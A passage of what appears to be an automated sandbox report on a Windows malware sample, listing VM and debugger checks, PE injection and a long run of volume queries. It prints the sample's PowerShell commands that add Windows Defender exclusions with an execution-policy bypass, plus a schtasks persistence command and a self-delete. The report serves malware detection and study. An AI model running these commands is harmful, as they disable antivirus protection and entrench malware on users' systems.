                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: Amcache.hve.29.drBinary or memory string: VMware
                            Source: Amcache.hve.29.drBinary or memory string: VMware Virtual USB Mouse
                            Source: Amcache.hve.29.drBinary or memory string: vmci.syshbin
                            Source: Amcache.hve.29.drBinary or memory string: VMware, Inc.
                            Source: Amcache.hve.29.drBinary or memory string: VMware20,1hbin@
                            Source: Amcache.hve.29.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                            Source: Amcache.hve.29.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                            Source: Amcache.hve.29.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                            Source: Amcache.hve.29.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                            Source: file.exe, 00000001.00000002.4158174681.0000000000DE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllip?
                            Source: Amcache.hve.29.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                            Source: Amcache.hve.29.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                            Source: Amcache.hve.29.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                            Source: Amcache.hve.29.drBinary or memory string: vmci.sys
                            Source: Amcache.hve.29.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                            Source: Amcache.hve.29.drBinary or memory string: vmci.syshbin`
                            Source: WindowsUpdaterConf.exe, 00000028.00000002.3653291877.0000000003182000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                            Source: Amcache.hve.29.drBinary or memory string: \driver\vmci,\driver\pci
                            Source: Amcache.hve.29.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                            Source: Amcache.hve.29.drBinary or memory string: VMware20,1
                            Source: Amcache.hve.29.drBinary or memory string: Microsoft Hyper-V Generation Counter
                            Source: Amcache.hve.29.drBinary or memory string: NECVMWar VMware SATA CD00
                            Source: Amcache.hve.29.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                            Source: Amcache.hve.29.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                            Source: Amcache.hve.29.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                            Source: Amcache.hve.29.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                            Source: Amcache.hve.29.drBinary or memory string: VMware PCI VMCI Bus Device
                            Source: Amcache.hve.29.drBinary or memory string: VMware VMCI Bus Device
                            Source: Amcache.hve.29.drBinary or memory string: VMware Virtual RAM
                            Source: Amcache.hve.29.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                            Source: WindowsUpdaterConf.exe, 00000028.00000002.3653291877.000000000317C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VIRTUALavmwarecVirtualBoxd69#116#127#115#82#122#122#56#114#122#122114#120#101#102#111
                            Source: Amcache.hve.29.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C2E08 CheckRemoteDebuggerPresent,0_2_061C2E08
                            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess queried: DebugPort
                            Source: C:\Users\user\WindowsUpdaterConf.exeProcess queried: DebugPort
                            Source: C:\Users\user\WindowsUpdaterConf.exeProcess queried: DebugPort
                            Source: C:\Users\user\WindowsUpdaterConf.exeProcess queried: DebugPort
                            Source: C:\Users\user\WindowsUpdaterConf.exeProcess queried: DebugPort
                            Source: C:\Users\user\WindowsUpdaterConf.exeProcess queried: DebugPort
                            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\WindowsUpdaterConf.exeProcess token adjusted: Debug
                            Source: C:\Users\user\WindowsUpdaterConf.exeProcess token adjusted: Debug
                            Source: C:\Users\user\WindowsUpdaterConf.exeProcess token adjusted: Debug
                            Source: C:\Users\user\WindowsUpdaterConf.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\WindowsUpdaterConf.exe'
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\WindowsUpdaterConf.exe'Jump to behavior
                            Bypasses PowerShell execution policy
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                            Injects a PE file into a foreign processes
                            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c timeout /t 1 && DEL /f file.exeJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\WindowsUpdaterConf.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsUpdaterConf.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsUpdaterConf" /tr "C:\Users\user\WindowsUpdaterConf.exe"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
